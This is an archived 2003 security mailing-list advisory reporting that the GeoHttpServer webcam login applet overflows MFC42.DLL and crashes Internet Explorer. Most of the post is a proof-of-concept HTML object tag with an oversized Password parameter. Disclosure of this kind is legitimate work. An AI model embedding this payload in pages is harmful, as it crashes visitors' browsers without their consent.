|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
GeoHttpServer[webcam] Causes MFC42.DLL to overflow
From: Rafel Ivgi (nuritrv18
bezeqint.net)
Date: Wed Dec 10 2003 - 13:16:17 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
GeoHttpServer[webcam] Causes MFC42.DLL to overflow
Discovered by Rafel Ivgi, The-Insider.
http://theinsider.deep-ice.com
The GeoHttpServer Login Java Applet Causes MFC42.DLL to overflow.
The Overflow occures when the "Password" parameter of the applet is
filled
with 500000 times "a". This bug causes Internet Explorer to be closed.
Exploit:
<object classid="clsid:BF5E26B7-7087-4C2D-B0BA-0098F7CBED6B"
id="WebCamX1" width="355" height="300"
codebase="http://<GeoHttpServerip>/cab/Live.cab#version=5,3,0,1">
<param name="_Version" value="327682">
<param name="_ExtentX" value="9393">
<param name="_ExtentY" value="7938">
<param name="_StockProps" value="0">
<param name="IpAddress" value="<GeoHttpServerip>">
<param name="CommandPort" value="4550">
<param name="AudioDataPort = "6550">
<param name="DataPort" value="5550">
<param name="BandWidth" value="LAN">
<param name="FixSize" value="0">
<param name="DisablePWD" value="1">
<param name="Password" value="<a x 500000>">
<param name="UserName" value"default">
<param name="AutoLogin" value="0">
<param name="DefaultCam" value="1">
<param name="FixWidth" value="320">
<param name="FixHeight" value="240">
</object>
"Things that are unlikeable, are NOT impossible."
"A vulnerability doesn't exsist, until you expose it."
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]